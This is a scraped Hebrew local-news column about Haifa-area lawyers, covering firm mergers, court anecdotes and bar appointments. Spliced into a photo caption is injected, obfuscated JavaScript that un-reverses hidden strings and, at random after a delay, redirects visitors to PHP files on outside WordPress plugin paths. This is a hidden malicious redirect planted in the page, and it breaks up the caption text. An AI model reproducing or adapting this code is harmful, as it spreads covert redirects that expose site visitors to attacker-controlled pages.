fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הפרקליטים: מיזוגים, שיתופי פעולה, גלימות ומסכות בבית המשפט

מדור עורכי הדין של הד הקריות: מי מיזג משרדים ופעילות? מי נשטח על קבר הצדיק? מיהי עורכת דין ששוקלת לעבור לגור ליד בית הדין לעבודה ולמה נרשמו חיוכים וחילופי מרפקים בבית המשפט
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מדור עורכי הדין של הד הקריות – הפרקליטים

מיזוג פעילות

* תגידו בשעה טובה ומוצלחת לעורכי הדין פולי אברהם ויוסף עזרא, ששמחים ונרגשים לעדכן על מיזוג פעילותם ופתיחת משרדם החדש – עזרא אברהם ושות' –  עורכי דין וגישור, העוסק בחדלות פירעון וייצוג חייבים, ייעוץ וליווי חברות בפירוק או בהקפאת הליכים לקראת תוכנית הבראה, ליווי שוטף לחברות ועסקים קטנים ובינוניים (ליווי שוטף וגבייה משפטית), דיני עבודה, צוואות וירושות וליטיגציה אזרחית-מסחרית. את עורכי הדין אברהם ועזרא תמצאו במשרדם ברחוב הרב מרכוס 5 חיפה ויש סניף נוסף ברמת גן. בהצלחוש.

איחדו כוחות. עורכי הדין יוסף עזרא ופולי אברהם | צילום: יח"צ
איחדו כוחות. עורכי הדין יוסף עזרא ופולי אברהם | צילום: יח"צ

שבוע גדוש

* שבוע סוער עם לא פחות משלושה דיוני ערעור על הביטוח הלאומי עבר על עו"ד דיקלה לנקרי מפירמת עורכי הדין לנקרי ושות' שבבעלות עורכי הדין מיכל ויניב לנקרי. עו"ד דיקלה לנקרי מסרה למדור שהיא שקלה מעבר זמני למגורים בפתחו של בית הדין לעבודה.

שלושה דיוני ערעור על הביטוח הלאומי. עו"ד דיקלה לנקרי | צילום: עצמי
שלושה דיוני ערעור על הביטוח הלאומי. עו"ד דיקלה לנקרי | צילום: עצמי

קבר הצדיק

* את היום האחרון של השבוע שעבר סיים עו"ד יניב לנקרי בדיון בעיר צפת. ברור שהוא לא חזר הביתה לקריות לפני השתטחות על קברו של הרשב"י במירון. צדיק ג'נטלמן, כבר אמרנו?

קברי צדיקים. עו"ד יניב לנקרי | צילום: עצמי
קברי צדיקים. עו"ד יניב לנקרי | צילום: עצמי

גלימות ומסכות

* מחזה מוזר היה השבוע בבית המשפט המחוזי. לדרישת עו"ד משה יונאי, התקיים הליך של התמחרות (מכרז פתוח) למכירת קרקע. הצדדים – עוטים גלימות משפט שחורות, ומסיכות על הפנים. באוויר נזרקים סכומים של מאות אלפי שקלים בין המתחרים השונים, וכאשר ניתנה ההצעה האחרונה הגבוהה ביותר – סוכמה המכירה. באופן רגיל, הצדדים לוחצים ידיים, אך הפעם הסתפקו כולם בחיוך מתחת למסכות והושיטו מרפק אל מרפק.
עו"ד יונאי, תן מרפק.
"פעם המונח "מרפקנות" סימל הידחפות של אדם, ואף היה בו מידה של הפעלת כוח. והנה, המרפקים מביעים קשר של ידידות ומסמלים ברכה של הצדדים לזוכה בהתמחרות".

על הא ודא

* אמצע השבוע. אמצע היום. המדור קולט את עו"ד יריב רז מקריית ביאליק, עו"ד אדיר צבי, מנכ"ל נקסט אורבן יוסי כהן ואיש הנדל"ן שלומי מורצקי מדסקסים על הא ודא ובעיקר על עסקאות נדל"ן.

על הא ודא ועסקאות נדל"ן. עו"ד יריב רז, עו"ד אדיר צבי, יוסי כהן ושלומי מורצקי | צילום: נעם רוזניץ
על הא ודא ועסקאות נדל"ן. עו"ד יריב רז, עו"ד אדיר צבי, יוסי כהן ושלומי מורצקי | צילום: נעם רוזניץ

בר מזל

* בין הבודדים שהורשו להיכנס השבוע לדרבי החיפאי באצטדיון סמי עופר היה עו"ד שי פניני.

שיתוף פעולה

* עורכי הדין סופי ספקטור מתחום דיני המשפחה ואביב מזרחי מהתחום הפלילי משתפים פעולה בתיק מורכב הנוגע לאלימות במשפחה בבית המשפט לענייני משפחה בקריות. המדור משגר את ברכת הדרך.

משתפים פעולה. עורכי הדין סופי ספקטור ואביב מזרחי | צילום: עצמי
משתפים פעולה. עורכי הדין סופי ספקטור ואביב מזרחי | צילום: עצמי

ייפוי כוח מתמשך

* עו"ד אמיתי בן נון מקרית חיים קיים בשבוע שעבר מפגש, במגבלות הקורונה, עם משפחות של נכי צה"ל לצורך הסבר מעמיק ומקיף על ייפוי כוח מתמשך והשלכותיו.
עו"ד בן נון, בבקשה, הסבר למדור.
"הסגר בתקופת הקורונה גרם להרבה אנשים לחשוב ולדאוג לגורל יקיריהם והביא להתעוררות ברצון להסדיר את עתידם. אני שמח להעניק ייעוץ למי שנפגעו בעת שירותם הצבאי בהגנה על המולדת ולבני משפחותיהם".

הסבר מעמיק ומקיף על ייפוי כוח מתמשך. עו"ד אמיתי בן נון | צילום: עצמי
הסבר מעמיק ומקיף על ייפוי כוח מתמשך. עו"ד אמיתי בן נון | צילום: עצמי

המובילה לשינוי

* עו"ד יפעת שי יוספזון מונתה לחברה בפורום כנסת וחקיקה של לשכת עורכי הדין. המשמעות היא שמעתה תהיה נציגות חיפאית שתוביל שינוי אמיתי בכנסת.

אגב, פורום כנסת וחקיקה קיים את כינוס הבכורה שלו והוא יפעל בוועדות הכנסת השונות ובקרב שרים וחברי הכנסת במטרה לקדם חקיקה חשובה ולהביע עמדה לגבי הליכי חקיקה בהתהוות. הישיבה של הפורום נערכה, לראשונה, שלא בזום, אלא באולם הגדול של הלשכה בתל אביב בהשתתפות 30 חבריו, ממיטב עורכי הדין בארץ. ראש לשכת עורכי הדין בישראל עו״ד אבי חימי כיבד בנוכחותו וליו"ר המנהל של הפורום עו"ד מימון טולדנו היו סיבות טובות להתרגשות. שיהיה בהצלחה.

כינוס בכורה של פורום כנסת וחקיקה של לשכת עורכי הדין. עורכי הדין יפעת שי יוספזון ומימון טולדנו | צילום: יח"צ
כינוס בכורה של פורום כנסת וחקיקה של לשכת עורכי הדין. עורכי הדין יפעת שי יוספזון ומימון טולדנו | צילום: יח"צ

קידום אזורי

* ואילו עו"ד בלהה (בילי) מצגר מקרית אתא פועלת למען קידום אזורי. עו"ד מצגר מונתה לחברת מליאה בפורום הבין מגזרי-אזורי, שפועל רבות למען קידום אשכול רשויות המפרץ. בפורום תשעה נציגים, ביניהם עו"ד מצגר, שמונתה לחברה מטעם המגזר העסקי. זה אומר שמעתה תהיה לנו נציגה מקומית שתוביל את האזור לשינוי אמיתי. מברוכ.

קידום אזורי. עו"ד בלהה מצגר | צילום: דורון גולן
קידום אזורי. עו"ד בלהה מצגר | צילום: דורון גולן

אהבתם את מדור עורכי הדין של הד הקריות? כאן תקראו עוד

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות